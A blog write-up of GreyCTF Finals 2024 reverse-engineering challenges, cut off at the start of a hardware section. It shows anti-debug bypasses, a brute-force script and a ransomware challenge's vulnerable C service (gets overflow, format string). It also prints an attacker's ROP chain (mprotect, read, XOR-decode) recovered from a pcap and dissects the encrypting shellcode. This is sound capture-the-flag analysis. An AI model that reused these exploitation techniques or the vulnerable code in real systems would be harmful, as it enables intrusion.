GreyCTF Finals 2024

03 Aug, 2024

6596 words | 31 minutes

This year, I competed in NUS Greyhat’s GreyCTF and managed to win first place with my team slight_smile. It was fun as hell and I had a blast playing the CTF, with the fight between the top 3 keeping us up for the whole 24 hours.


Fig: Not even close (I lie through my teeth)

For this CTF, I primarily worked on the rev and hardware challenges and entirely choked the blockchain category (which I later solved after the CTF).

I won’t include the full source or content of every challenge, but you can view it yourself here: https://github.com/NUSGreyhats/greyctf24-challs-public/tree/main/finals

Reverse Engineering

Hungry Ghost Festival

Hungry Ghost Festival is a Heaven’s Gate challenge, where we go from a 64-bit program to run some 32-bit shellcode. We’re given two files, a challenge binary and gate.bin.

Running the binary presents us with some cute ASCII art, a hash and some melancholic text:


Fig: Program execution output

Decompiling the binary in Ghidra gives us the gist of what’s going on. I’ve thrown in some labels into the decompilation output to make reading easier.

Going into entry then __libc_start_main, we arrive at main:

 1int main(int argc,char *argv)
 2
 3{
 4  time_t currTime;
 5  long pTrace_check;
 6  
 7  get_argv_md5(*(undefined8 *)argv);
 8  printf(&DAT_00102030,&DAT_00105040); // prints the art
 9  currTime = time((time_t *)0x0);
10  if (currTime == 1722700800) {
11     pTrace_check = ptrace(PTRACE_TRACEME);
12     if (pTrace_check != -1) {
13        execute_gate(*(undefined8 *)argv);
14     }
15  }
16  return 0;
17}

We can see there are two barriers to the execution of the rest of the program, which is the time having to be a specific timestamp and a ptrace check to see if we’re in a debugger. This is trivial to defeat in gdb, both just requiring you to break execution before the checks and just jump over them. (Alternatively, you can patch the binary to invert the checks, which is the even lazier method which I employed).

Now, we can look at the execute_gate function:

 1void execute_gate(void)
 2
 3{
 4  int __fd;
 5  void *__s;
 6  
 7  __fd = open("gate.bin",0);
 8  __s = mmap((void *)0x0,0x1000,7,0x42,__fd,0);
 9  *(undefined4 *)((long)__s + 0x500) = _DAT_00105040;
10  memfrob(__s,0x1000);
11  return;
12}

We can see that it reads the data from gate.bin, allocates memory for it, runs memfrob (which just xor decodes it against 42), then returns. The return here is deceptive, as looking at the actual assembly, we find that the function ends with a retf:

0010131c e8 df fd        CALL       <EXTERNAL>:: void * memfrob(void * __s, size_
		 ff ff
00101321 48 c7 c3        MOV        RBX,0x23
		 23 00 00 00
00101328 48 c1 e3 20     SHL        RBX,0x20
0010132c 48 01 d8        ADD        RAX,RBX
0010132f 50              PUSH       RAX
00101330 cb              RETF
00101331 90              ??         90h
00101332 c9              ??         C9h
00101333 c3              ??         C3h

The retf lets us switch to 32-bit mode and jumps execution to where we want, which in this case is the binary we just loaded. Being lazy, we can run the binary in gdb and just get to this point, then dump the instructions following the current rip.

0x40000000:  xchg   edi,esp
0x40000002:  add    esp,0x520
0x40000008:  xor    ebx,ebx
0x4000000a:  xor    ecx,ecx
0x4000000c:  push   0x1a
0x4000000e:  pop    rax
0x4000000f:  int    0x80
0x40000011:  cmp    eax,0xffffffff
0x40000014:  jne    0x4000001d
0x40000016:  xor    ebx,ebx
0x40000018:  push   0x1
0x4000001a:  pop    rax
0x4000001b:  int    0x80

Our first bit of shellcode is Yet Another P-Trace Check (as eax = 0x1a, the interrupt is sys_ptrace), where the program exits (interrupt on eax = 0x1) if it fails.

We defeat this check by setting eax to 0, and carry on.

0x4000001d:  mov    ebx,esp
0x4000001f:  xor    ecx,ecx
0x40000021:  push   0x4e
0x40000023:  pop    rax
0x40000024:  int    0x80

Our next interrupt is sys_gettimeofday. Given that we manipulated the time earlier, we should probably edit the struct in memory (location pointed in rsp) to reflect that. From the spec, we can see the struct looks like this:

struct timeval {  
     time_t tv_sec; /* seconds */  
     suseconds_t tv_usec; /* microseconds */  
};

We edit tv_sec to be 0x66ae5400 and tv_usec to be 0x00000000.

The rest of the shellcode is just a bunch of calls to sys_write to std_out, which is our flag being printed.

Flag: grey{tr1ppy_4ss_r3v3rs1ng_ch4ll3ngexd}

Overly Simplified Rev Chall

This is a nasty challenge whereby there are fuckall structures to work with. It’s a “flat” binary with no functions or stack and calls for some de-obfuscation. No decompilation to work with because everything is screwed up, so we rely on the execution flow graph.

From what I’ve seen before, operations like xor, cmp, test are usually a nice indicator of actual program logic, so we look out for those.


Fig: Program execution output

This program is really simple: reads in a flag input, checks if its correct, print, exit.

We first start by determining where this flag is actually being read into. With gdb, we interrupt the program once the prompt appears to get ourselves a place to break.


Fig: Breaking right after input prompt

We set a breakpoint at 0x4011e1, re-run the program after putting in some input and inspect the registers:


Fig: Stepping one after, we can now see where the input is stored!

Our input string is written to 0x4040c0, and we jump our $rsp over to 0x4041c0. $rax stores the length of our string, which is basically immediately used for a newline check:

●→   0x4011e1                  lea    rsp, ds:0x4041c0 
     0x4011e9                  pop    rbx 
     0x4011ea                  lea    rsp, [rbx+rax*1-0x1] 
     0x4011ef                  pop    rcx
     0x4011f0                  cmp    cl, 0xa

The last instruction there compares the last character of the string against 0xa, which we know to be \n.

Laziness then overwhelms me, and looking at the flow graph, we have some sort of compare a few loops later


Fig: We look at `0x40127d`, where some compare occurs

Placing a breakpoint there, we see that $rcx holds our input length, so we’ve know there’s a check for a string length of 0x28 == 40, thus we make an assumption that this is how long our flag has to be. This is how most of our reversing flow is gonna go for the remainder of this challenge: skipping past large swathes of static reversing by whacking breakpoints.

We actually get to skip a massive portion of the program in this one move, which is a huge move for my sanity.


Fig: Basically everything in this screenshot gets skipped, which is a massive dub

We re-run our program with grey{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA} to hit this 40 character requirement and press forward.

We spot two interesting comparisons at 0x401482 and 0x40149a, so we put some breakpoints and step through.


Fig: The fragment we’re currently investigating

We notice that $rcx behaves as a counter in the later half of this loop, being compared against 0x5. This is a fairly common pattern we find in asm and will be seeing more of it. What’s interesting is the cmp cl, r8b which occurs at each iteration.

We see loads from the regions 0x4041c0, 0x404070 and 0x404068, which correspond to a pointer to some bytestring, a saved copy of the $rcx counter and a pointer to our input string respectively. Using some intuition, we can discern that we’re reading characters from our input, performing some manipulations to it, and comparing it against something else. With the counter being restricted to 0x5 and our execution going so cleanly with our input string, we can determine this is a check for the grey{ part of the flag format!

Using vibes based analysis, we notice a similar code block later on which also has a xor r8d, 0xffffff80 followed by a cmp cl, r8b.


Fig: Seeing double…

Placing a breakpoint at 0x401c48, we find that we’re able to reach that point of execution with our input string, cleanly jumping past a bunch of program logic again. The program clearly runs through all that stuff, however, so it might be important to look at again later.

Either way, we’re able to clear this cmp 5 times, which lends us to believe that we’re ingesting the whole string again since we can for sure pass the first 5 characters.

The check finally fails on the 6th character, which is where our input actually begins. So, let’s try and discern the logic here to work out how to get our flag. Thankfully for us, the addresses we looked at earlier correspond to similar things, so we can eyeball what’s going on here:

We know that 0x404070 is a copy of the length counter, and it is first loaded into $rcx
We know that 0x4041c0 is a pointer to some bytestring, and we add our counter to it, so we shift up by one character
We load this character into $rcx
0x404068 doesn’t point to our input string anymore but instead some other bytestring, but judging by the program logic, it has to be related to our original input. This is loaded into $r9
The length counter is then loaded in to $r8, which we add $r9 to, reading the next character in.
$r8 is esentially being XOR’d against 0x80

So we want to figure out what’s the deal with 0x404068, which seems to be some modified version of our input string.

Skimming through the section we skipped past, we find a reference to this address and an xor operation that occurs before it.


Fig: Mysterious XOR?

Placing a breakpoint here, we notice that $rcx actually carries the characters from our string and $r9 is filled with some byte every iteration which we XOR against. So now we know our input string has been XOR’d against some other string, so we can just pass in our all A flag to undo the XOR, then work backwards to get our flag string!

We first dump the final bytestring produced using our input:

gef➤  x/40b 0x4042e0
0x4042e0:       0x54    0x37    0xf4    0x93    0xbb    0x6e    0xb8    0x77
0x4042e8:       0xd8    0x39    0x13    0xe4    0x9a    0xb8    0x10    0xb6
0x4042f0:       0x18    0x45    0xe7    0xfd    0x92    0x4c    0x6f    0xf1
0x4042f8:       0x95    0x10    0x8c    0x0b    0x67    0xce    0xb1    0xc3
0x404300:       0x74    0x0e    0x64    0xd4    0x2d    0xfc    0xaa    0x54

We XOR this against grey{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA} to retrieve the XOR key.

We then dump the bytestring our XOR’d input is compared against:

gef➤  x/40b 0x404020
0x404020:       0xd4    0xb7    0x74    0x13    0x3b    0xd8    0x2e    0xd3
0x404028:       0x53    0x87    0xb3    0x71    0x26    0x24    0xb9    0x01
0x404030:       0x88    0xe1    0x6c    0x68    0x27    0xd6    0xd0    0x50
0x404038:       0x10    0xb5    0x1b    0xa4    0xd6    0x66    0x1c    0x77
0x404040:       0xc5    0xa6    0xc9    0x60    0x9c    0x54    0x07    0xf9

Then we XOR all this against 0x80.

>>> a = [0xd4, 0xb7, 0x74, 0x13, 0x3b, 0xd8, 0x2e, 0xd3, 0x53, 0x87, 0xb3, 0x71, 0x26, 0x24, 0xb9, 0x01,  0x88, 0xe1, 0x6c, 0x68, 0x27, 0xd6, 0xd0, 0x50, 0x10, 0xb5, 0x1b, 0xa4, 0xd6, 0x
66, 0x1c, 0x77,  0xc5, 0xa6, 0xc9, 0x60, 0x9c, 0x54, 0x07, 0xf9]
>>> b = [0x54, 0x37, 0xf4, 0x93, 0xbb, 0x6e, 0xb8, 0x77,0xd8, 0x39, 0x13, 0xe4, 0x9a, 0xb8, 0x10, 0xb6, 0x18, 0x45, 0xe7, 0xfd, 0x92, 0x4c, 0x6f, 0xf1, 0x95, 0x10, 0x8c, 0x0b, 0x67, 0xce, 0xb1, 0xc3,  0x74, 0x0e, 0x64, 0xd4, 0x2d, 0xfc, 0xaa, 0x54]
>>> c = list(b"grey{" + b"A"*34 + b"}")
>>> ''.join(chr(a[i]^b[i]^c[i]^0x80) for i in range(0x28))
'grey{wWeJ\x7faT}]hvQeJTt[~`DdVnpilupilupilP'

Wait. That doesn’t look like a flag.

What we forgot to consider is that the string that our input is XOR’d against is likely dynamic in some sense and likely dependent on our input itself. However, by giving that massive block we skipped a cursory look, we can tell that the generated XOR byte for character n is made up of manipulations to the characters [0, n-1], so we thankfully can just go character by character to get our flag.

So the flow is simple:

Breakpoint at the cmp cl, r8b at 0x401c48
When we reach a new character that fails the check, we dump the byte at 0x4042e0 + offset, 0x404020 + offset
XOR those bytes against 0x80 and 0x41 (since we’d still be using the placeholder A character there) to retrieve the actual character
Repeat execution with the new prefix string

This can be automated with r2 or some python gdb wrapper, but during the CTF itself I just whacked all 40 characters by hand.

Flag: grey{wasnt_that_fun_and_easy_XDXDXDXDXD}

A Sky Full Of Stars

We’re presented with a binary which you pipe some input into and produces a corresponding hash. We can replicate this with a simple echo -n <string> | ./stars, so we start spamming some random inputs.


Fig: The Scientific Method

Some spamming later, we find that we only get an output when we have a multiple of 3 wrapped in the braces, and our target flag has 21 characters wrapped in there.

I will be perfectly honest: I did not bother statically reversing this AT ALL. The challenge gets its name from what the decompilation output looks like:


Fig: Truly, a sky full of stars

Derefs on top of derefs… yeah, no thanks.

Something noticeable is that changing the characters of the flag one by one modifies the output in localised regions, which we can discern just corresponds to the position of the modified character.


Fig: The Scientific Method, Part 2

Modifying one character doesn’t always lead to just one byte in the output changing, but we can see that it’s consistent up until the position of the changed character. This does mean that for every increasing subportion of the output that we match, there would be multiple possible prefix strings that produce the correct output, but we anticipate that by the time we reach the end of the flag itself we would converge to one solution.

I actually fucked up my bruteforce script during the CTF due to some incorrectly placed break in my script, but thankfully my teammate jiajie bothered to tackle this challenge himself and came to basically the same script as me (although he did bother with some static reverse).


Fig: Re: Implementing a bruteforce script

We just directly implement the idea:

 1from pwn import *
 2import itertools
 3import string
 4context.log_level = 'error'
 5
 6
 7def main():
 8    solved = ""
 9    target = b"3082d99f70d36a8f0aad4d95e47c22e6ec9ec0bbc8afd372651a29"
10    starts = [""]
11
12    charset = string.printable
13
14    while True:
15        new = []
16        solved = len(starts[0])
17
18        if solved == 22:
19            for start in starts:
20                test = "grey{" + start
21                io = process(f"echo -n {test} | ./stars", shell=True)
22                output = io.recvall()[:-1]
23                print(test)
24                print(output)
25                if output == target:
26                    return
27        
28        for start in starts:   
29            for c in charset:
30                if len(start+c) == 23:
31                    return
32                test = "grey{" + start + c + "a"*(22-len(start)-1)
33                io = process(f"echo -n {test} | ./stars", shell=True)
34                output = io.recvall()[8:8+2*len(start+c)]
35                if output == target[8:8+2*len(start+c)]:
36                    print(test)
37                    new.append(start+c)
38        
39        if len(new) == 0:
40            print("Something went wrong lmao")
41            return
42
43        starts = [_ for _ in new]
44        print(starts)
45
46main()

There’s actually a cheeky newline at the end, so the wrapped flag is only 20 characters long.

Flag: grey{5uch_4_h34v3nly_v13w}

Ransomware

This was hands down one of the most fun reverse challenges I’ve played, and it took quite a hella long time for us to solve it during the CTF itself due to some of the tedium involved.

We’re given a few files: service, service.c which is the source code for the service binary, libc.so.6 which is the libc the service uses (having provided libc 🙏 BLESS 🙏), an encrypted flag.txt and capture.pcapng.

Very interesting!

Let’s look at service.c:

 1#include <stdint.h>
 2#include <stdio.h>
 3#include <unistd.h>
 4#include <stdlib.h>
 5#include <string.h>
 6
 7
 8void setup() {
 9   setbuf(stdout, 0);
10   setbuf(stdin, 0);
11}
12
13char *usernames[] = {"jro", "a", "b", "c", "d"};
14char *passwords[] = {"Very secure pass", "a", "b", "c", "d"};
15int len = 5;
16
17int main(){
18    setup();
19    char username[0x10];
20    char password[0x10];
21
22    while(1) {
23        printf("Enter username: ");
24        gets(username);
25        int found_id = -1;
26        for(int i = 0; i < len; i++){
27            if(!strcmp(usernames[i], username)){
28                found_id = i;
29                break;
30            }
31        }
32        if(found_id == -1){
33            printf("OOps! ");
34            printf(username);
35            printf(" is not a valid username!\n");
36        } else {
37            printf("Enter password: ");
38            gets(password);
39            if(strcmp(passwords[found_id],password)){
40                printf("Wrong password!\n");
41            } else {
42                printf("Welcome ");
43                printf(username);
44                putchar('!');
45                putchar('\n');
46                return 0;
47            }
48        }
49    }
50}

It’s a simple program that reads in a username and password and compares it against some fixed values. What’s interesting is that our reads for username and password are done with gets, which opens up an opportunity for a buffer overflow, and the username is directly printed with printf, which opens up an opportunity for a format string exploit.

Why do I bring this up? Because looking at the pcap, we find logs of an attacker doing just that!

Here are some snippets of the pcap:




Fig: Format String attack performed~


Fig: Buffer Overflow attack performed

This is followed up by what we can assume is shellcode being inputted as well.




Fig: Shellcode being sent?

Judging by the output of the format string, we have a stack canary leak (0xb510a946cf71c600) followed by a libc address leak (0x7f4ec997fc8a).

Let’s look at the buffer overflow payload.

Breaking it up and fixing the endianness, we find that we can’t directly disassemble it as it’s actually a rop chain!

41414141414141414141414141414141414141414141414141414141414141414141414141414141 <- overflow
b510a946cf71c600 <- canary
0000000000000000
00007f4ec9a605ad 
0000000000000007
00007f4ec9981b29 
0000000000002000
00007f4ec9980215 
0000000000401000
00007f4ec9a60430 
00007f4ec9a605ad 
0000000000002000
00007f4ec9981b29 
0000000000401100
00007f4ec9980215 
0000000000000000
00007f4ec9a56a10 
00007f4ec9981b29 
0000000000001000
00007f4ec9980215 
0000000000401100
00007f4ec99f5370
0000000000401e2e

So, we first have to somehow reverse engineer the rop chain. We’ve been given the libc, so its a matter of determining the base address of libc, then dumping the gadgets appropriately.

We know that the libc base address would be something like 0x7f4ec9xxx000, so we have to bruteforce those 4096 possible base addresses. We sort of have an idea of what gadgets we’re looking for: since we often see the address following a value, we can assume its some sort of pop reg gadget, so we filter accordingly.

 1from pwn import *
 2# Load the libc file
 3libc = ELF('./libc.so.6')
 4
 5# Function to find and print the gadget
 6def find_gadget(base_address):
 7    # Set the base address of the loaded libc
 8    libc.address = base_address
 9    
10    gadget_address = 0x00007f4ec9981b29 
11    
12    # Try to find the gadget
13    try:
14        gadget = libc.disasm(gadget_address, 10)  # Disassemble 10 bytes, adjust if needed
15        
16        # If we reach here, it means we successfully disassembled the gadget
17        print(f"\nValid gadget found at base address: {hex(base_address)}")
18        print(f"Gadget at {hex(gadget_address)}:")
19        print(gadget)
20        
21        # Check if it's a 'pop reg' gadget
22        is_pop_reg = 'pop' in gadget.split('\n')[0]
23        pop_reg_status = "This is a 'pop reg' gadget" if is_pop_reg else "This is not a 'pop reg' gadget"
24        print(pop_reg_status)
25        
26        # Append to file
27        if is_pop_reg:
28            with open("offsets.txt", "a") as f:
29                f.write(f"Base Address: {hex(base_address)}\n")
30                f.write(f"Gadget Address: {hex(gadget_address)}\n")
31                f.write(f"Gadget:\n{gadget}\n")
32                f.write(f"{pop_reg_status}\n\n")
33        
34    except:
35        # Suppressing the error, do nothing if gadget can't be disassembled
36        pass
37
38# Bruteforce the xxx values
39for xxx in range(0x1000):  # Adjust range as needed
40    base_address = 0x7f4ec9000000 | (xxx << 12)
41    find_gadget(base_address)

We run this with different values for gadget_address, and in fact we only need two iterations of this script to determine the correct base address:

Base Address: 0x7f4ec9958000
Gadget Address: 0x7f4ec9981b29
Gadget:
    7f4ec9981b29:       5e                      pop    rsi
    7f4ec9981b2a:       c3                      ret
    7f4ec9981b2b:       0f 1f 44 00 00          nop    DWORD PTR [rax+rax*1+0x0]
    7f4ec9981b30:       48                      rex.W
    7f4ec9981b31:       8d                      .byte 0x8d
    7f4ec9981b32:       3d                      .byte 0x3d
This is a 'pop reg' gadget

Base Address: 0x7f4ec9958000
Gadget Address: 0x7f4ec9981b29
Gadget:
    7f4ec9981b29:       5e                      pop    rsi
    7f4ec9981b2a:       c3                      ret
    7f4ec9981b2b:       0f 1f 44 00 00          nop    DWORD PTR [rax+rax*1+0x0]
    7f4ec9981b30:       48                      rex.W
    7f4ec9981b31:       8d                      .byte 0x8d
    7f4ec9981b32:       3d                      .byte 0x3d
This is a 'pop reg' gadget

Now that we have the libc base address as 0x7f4ec9958000, we can fill in the blanks for the buffer overflow input.

41414141414141414141414141414141414141414141414141414141414141414141414141414141 <- overflow
b510a946cf71c600 <- canary
0000000000000000
00007f4ec9a605ad pop rdx; ret
0000000000000007
00007f4ec9981b29 pop rsi; ret
0000000000002000
00007f4ec9980215 pop rdi; ret
0000000000401000
00007f4ec9a60430 mov eax, 0xa; syscall; ret

^^ mprotect on 0x401000, of size 0x2000, set to 0x7 (probs rwx)

00007f4ec9a605ad pop rdx; ret
0000000000002000
00007f4ec9981b29 pop rsi; ret
0000000000401100
00007f4ec9980215 pop rdi; ret
0000000000000000
00007f4ec9a56a10 xor eax, eax; syscall

^^ syscall read on fd = 0, buf 0x401100, size 0x2000

00007f4ec9981b29 pop rsi; ret
0000000000001000
00007f4ec9980215 pop rdi; ret
0000000000401100
00007f4ec99f5370 

^^ big ass gadget

0000000000401e2e

So we can see that we perform an mprotect on a memory region, followed by a read via stdin to that memory region.

Finally, we call some massive gadget found at 0x7f4ec99f5370.

    7f4ec99f5370:       48 89 f8                mov    rax, rdi ; rax =  0x0000000000401100
    7f4ec99f5373:       48 85 f6                test   rsi, rsi 
    7f4ec99f5376:       74 28                   je     0x7f4ec99f53a0 ; not taken
    7f4ec99f5378:       48 8d 0c 37             lea    rcx, [rdi+rsi*1] 
    7f4ec99f537c:       83 e6 01                and    esi, 0x1
    7f4ec99f537f:       48 89 fa                mov    rdx, rdi
    7f4ec99f5382:       74 0c                   je     0x7f4ec99f5390
    7f4ec99f5384:       48 8d 57 01             lea    rdx, [rdi+0x1]
    7f4ec99f5388:       80 37 2a                xor    BYTE PTR [rdi], 0x2a
    7f4ec99f538b:       48 39 d1                cmp    rcx, rdx
    7f4ec99f538e:       74 11                   je     0x7f4ec99f53a1
    7f4ec99f5390:       80 32 2a                xor    BYTE PTR [rdx], 0x2a
    7f4ec99f5393:       48 83 c2 02             add    rdx, 0x2
    7f4ec99f5397:       80 72 ff 2a             xor    BYTE PTR [rdx-0x1], 0x2a
    7f4ec99f539b:       48 39 d1                cmp    rcx, rdx
    7f4ec99f539e:       75 f0                   jne    0x7f4ec99f5390
    7f4ec99f53a0:       c3                      ret

It seems like what this gadget does is an XOR decode on the input against 0x2a, and we finally return to 0x401e2e, which will serve as the entry point for our shellcode which has been written to 0x401100.

This shellcode is LONG AS HELL and I’d spare you the misery of looking through it in this post. Apparently it’s some implementation of ChaCha or something, but I honestly don’t really care. Long story short, it prints a sad face to stdout (which we see in the pcap), takes in an input that goes into an mmap’d region (which we also know happens from the pcap since a second stage is sent), and then does some manipulation to this input.

What’s probably most important it what comes at the end:

...
0x00401f6a:  4889d6           mov        rsi, rdx
0x00401f6d:  4889c7           mov        rdi, rax
0x00401f70:  b800000000       mov        eax, 0
0x00401f75:  ffd1             call       rcx
0x00401f77:  90               nop        
0x00401f78:  c9               leave      
0x00401f79:  c3               ret

So we know that whatever has been input and manipulated is eventually called. Great. Why don’t we just emulate it?

 1from pwn import *
 2
 3context.terminal = ['st']
 4context.arch = 'amd64'
 5
 6hex_string = "7f62a3cfa357d662a35fda62a37fc262edea2a2a2a2a252..."
 7hex_string = hex_string.replace(" ", "").replace("0x", "")
 8code = bytes.fromhex(hex_string)
 9shellcode = bytes([b ^ 0x2a for b in code])
10
11with open("shellcode.bin", "wb") as f:
12    f.write(shellcode)
13    
14io = gdb.debug_shellcode(shellcode, vma=0x0401100, gdbscript="""
15 b *0x401e2e
16 jump *0x401e2e
17 b *0x00401f75
18""")
19b = open("final.bin", "rb").read()
20io.sendline(b)

We store the second stage in shellcode.bin and add a few breakpoints so that we can jump to the specified entrypoint of 0x401e2e and then stop right before the call rcx.

Doing this, we then jump execution to the second stage of the payload!


Fig: The shellcode sequel

Stepping through execution, we get pretty far until we crash at some attempt to call a function from libc, which of course we don’t have loaded at the correct address.

We place a breakpoint at the first attempt to call something:


Fig: Attempted call to a libc function

So… assuming that all these calls in the shellcode will resolve to libc functions, we painstakingly place breakpoints on all of them, then manually resolve the symbols ourselves.

Let’s breakdown the final shellcode piece by piece together:

   0x7257e81053ab:      mov    rdi,rax
=> 0x7257e81053ae:      call   0x7257e81051f4; open(./flag.txt)
   0x7257e81053b3:      mov    DWORD PTR [rbp-0x20],eax
   0x7257e81053b6:      lea    rax,[rbp-0x70]
   0x7257e81053ba:      mov    edx,0x21
   0x7257e81053bf:      mov    esi,0x0
   0x7257e81053c4:      mov    rdi,rax
   0x7257e81053c7:      call   0x7257e8105133; (memset of 33)
   0x7257e81053cc:      lea    rcx,[rbp-0x70]
   0x7257e81053d0:      mov    eax,DWORD PTR [rbp-0x20]
   0x7257e81053d3:      mov    edx,0x20
   0x7257e81053d8:      mov    rsi,rcx
   0x7257e81053db:      mov    edi,eax
   0x7257e81053dd:      call   0x7257e810518b; (read to memset addr)
   0x7257e81053e2:      mov    eax,DWORD PTR [rbp-0x20]
   0x7257e81053e5:      mov    edi,eax
   0x7257e81053e7:      call   0x7257e8105153; (close fd)

We first make some call to open(./flag.txt) and read the contents to an address that we freshly memset.

   0x7257e81053ec:      lea    rax,[rbp-0x80]
   0x7257e81053f0:      mov    rsi,rax
   0x7257e81053f3:      mov    edi,0x0
   0x7257e81053f8:      call   0x7257e81051ab; (clock_gettime)
   0x7257e81053fd:      mov    rax,QWORD PTR [rbp-0x80]
   0x7257e8105401:      mov    edi,eax
   0x7257e8105403:      call   0x7257e81051c7; (srand(epoch_seconds))
   0x7257e8105408:      mov    DWORD PTR [rbp-0x24],0x20

We get the time and seed an srand with it. Thankfully, by having the pcap, we know that the epoch the payload arrived at was 1720325377.019028720, so we just work around that range.

   0x7257e810540f:      mov    eax,DWORD PTR [rbp-0x24]
   0x7257e8105412:      cdqe
   0x7257e8105414:      mov    rdi,rax
   0x7257e8105417:      call   0x7257e8105283; mmap(0, 0x20, -wx, 0x21, -1, 0x0)
   0x7257e810541c:      mov    QWORD PTR [rbp-0x30],rax
   0x7257e8105420:      call   0x7257e8105210; get_pid
   0x7257e8105425:      mov    DWORD PTR [rbp-0x34],eax
   0x7257e8105428:      mov    DWORD PTR [rbp-0x14],0x0
   0x7257e810542f:      jmp    0x7257e81054d7

We mmap another region and then make a call to get_pid, which is spooky cuz it means there might be some forking logic.

This is immediately realised:

   0x7257e8105434:      call   0x7257e810523d; fork
   0x7257e8105439:      mov    DWORD PTR [rbp-0x38],eax
   0x7257e810543c:      mov    eax,0x0
   0x7257e8105441:      call   0x7257e81051df ; rand

We then do a bunch of manipulations which, erm, don’t seem to amount to much besides a call to usleep(1) to screw with you.

   0x7257e8105446:      movsxd rdx,eax
   0x7257e8105449:      imul   rdx,rdx,0x51eb851f
   0x7257e8105450:      shr    rdx,0x20
   0x7257e8105454:      sar    edx,0x5

   0x7257e8105457:      mov    ecx,eax
   0x7257e8105459:      sar    ecx,0x1f
   0x7257e810545c:      sub    edx,ecx
   0x7257e810545e:      mov    DWORD PTR [rbp-0x3c],edx
   0x7257e8105461:      mov    edx,DWORD PTR [rbp-0x3c]
   0x7257e8105464:      imul   edx,edx,0x64

   0x7257e8105467:      sub    eax,edx
   0x7257e8105469:      mov    DWORD PTR [rbp-0x3c],eax
   0x7257e810546c:      mov    DWORD PTR [rbp-0x18],0x0

   0x7257e8105473:      jmp    0x7257e8105483

   0x7257e8105475:      mov    edi,0x1
   0x7257e810547a:      call   0x7257e8105225 ; usleep(1)
   0x7257e810547f:      add    DWORD PTR [rbp-0x18],0x1

   0x7257e8105483:      mov    eax,DWORD PTR [rbp-0x18]
   0x7257e8105486:      cmp    eax,DWORD PTR [rbp-0x3c]
   0x7257e8105489:      jl     0x7257e8105475

Now, we actually get to the juicy parts:

   0x7257e810548b:      mov    eax,DWORD PTR [rbp-0x14] ; 0x0?
   0x7257e810548e:      movsxd rdx,eax
   0x7257e8105491:      mov    rax,QWORD PTR [rbp-0x30] ; mmap
   0x7257e8105495:      add    rax,rdx
   0x7257e8105498:      movzx  eax,BYTE PTR [rax]
   0x7257e810549b:      test   al,al
   0x7257e810549d:      jne    0x7257e81054e5

   0x7257e810549f:      mov    eax,0x0
   0x7257e81054a4:      call   0x7257e81051df ; rand

   0x7257e81054a9:      mov    ecx,eax
   0x7257e81054ab:      mov    eax,DWORD PTR [rbp-0x14]
   0x7257e81054ae:      movsxd rdx,eax
   0x7257e81054b1:      mov    rax,QWORD PTR [rbp-0x30]
   0x7257e81054b5:      add    rax,rdx
   0x7257e81054b8:      mov    edx,ecx
   0x7257e81054ba:      mov    BYTE PTR [rax],dl ; store rand output in mmap

Here we mmap another region of memory and then start storing the output of rand in the mmap’d region.

   0x7257e81054bc:      cmp    DWORD PTR [rbp-0x38],0x0 ; checks child status
   0x7257e81054c0:      je     0x7257e81054d3
   0x7257e81054c2:      mov    eax,0x0
   0x7257e81054c7:      call   0x7257e81051df ; rand
   0x7257e81054cc:      mov    edi,eax
   0x7257e81054ce:      call   0x7257e81051c7 ; srand
   0x7257e81054d3:      add    DWORD PTR [rbp-0x14],0x1 ; increment counter
   0x7257e81054d7:      mov    eax,DWORD PTR [rbp-0x14]
   0x7257e81054da:      cmp    eax,DWORD PTR [rbp-0x24] ; until 0x20
   0x7257e81054dd:      jl     0x7257e8105434
   0x7257e81054e3:      jmp    0x7257e81054e6

We then re-seed srand() with the output of rand() and we do this a total of 32 times. What we note is that each forked process will still write to the same mmap’d region of memory, so we can actually mimic this process without performing a bunch of forks by simply doing something like

  time_t seed = 1720325377;
  srand(seed);

  for (int i = 0; i < 32; i++) {
    rand();
    printf("\\x%hhx", rand());
    srand(rand());
  }

Skipping past a bit of shellcode, we then reach the actual encryption step:

   0x7257e8105512:      movzx  ecx,BYTE PTR [rbp+rax*1-0x70] ; probably the flag
   0x7257e8105517:      mov    eax,DWORD PTR [rbp-0x1c]
   0x7257e810551a:      movsxd rdx,eax
   0x7257e810551d:      mov    rax,QWORD PTR [rbp-0x30] ; mmap address
   0x7257e8105521:      add    rax,rdx
   0x7257e8105524:      movzx  eax,BYTE PTR [rax]

   0x7257e8105527:      xor    ecx,eax
   0x7257e8105529:      mov    edx,ecx
   0x7257e810552b:      mov    eax,DWORD PTR [rbp-0x1c]
   0x7257e810552e:      cdqe
   0x7257e8105530:      mov    BYTE PTR [rbp+rax*1-0x70],dl
   0x7257e8105534:      add    DWORD PTR [rbp-0x1c],0x1
   0x7257e8105538:      mov    eax,DWORD PTR [rbp-0x1c]
   0x7257e810553b:      cmp    eax,DWORD PTR [rbp-0x24] ; until 0x20
   0x7257e810553e:      jl     0x7257e810550d

Good ol’ XOR! We XOR the random bytes generated with the flag, and we conclude the shellcode with another open(./flag.txt) and a write to it. Wonderful! Now all we have to do is replicate the random byte generation process, XOR it against our encrypted flag and we win.

However, as we were doing this, my teammate samuzora realised that only a portion of the flag gets decrypted and the rest looks like garbage. This is actually due to the behaviour of all the forking being non-deterministic, which means that a few of the srand(rand()) iterations actually get skipped. But fortunately, this can be easily resolved by, well, skipping them based on manual observation.

Our final random key generation script looks like this:

 1#include <stdio.h>
 2#include <stdlib.h>
 3
 4int main() {
 5  time_t seed = 1720325377;
 6  srand(seed);
 7
 8  for (int i = 0; i < 32; i++) {
 9    rand();
10    printf("\\x%hhx", rand());
11    if (i != 5 && i != 14 && i != 15 && i != 16 && i != 18 && i != 20 && i != 23 && i != 24 && i != 25) {
12      srand(rand());
13    }
14  }
15}

And once we XOR it against our encrypted flag…

key = b"\x2c\x29\xf9\x2c\x77\xa7\x71\xc7\x80\x31\x77\x96\xe9\xf5\x70\xa2\xaf\xbb\xcc\x8b\x0a\xe3\x6a\x70\x72\x6e\xed\x12\xb2\xa2\x13\xc7"
ct = open("./flag.txt", "rb").read()
print("".join([chr(i ^ j) for i, j in zip(ct, key)]))

We get the flag!

Flag: grey{r4n50m_m0r3_l1k3_r4nd0m_XD}

Hardware

Bootloader

This challenge is actually Yet Another Reverse Engineering challenge, so I’ve included it here.

This CTF came with a really cool and cute badge which itself made up the hardware challenges, being an STM32 based board.


Fig: Super Kawaii Badge

This challenge requires us to enter bootloader mode on the board, which can be accomplished by setting BOOT1 high and setting BOOT0 low, and this brings up… a website??


Fig: The WebDFU utility

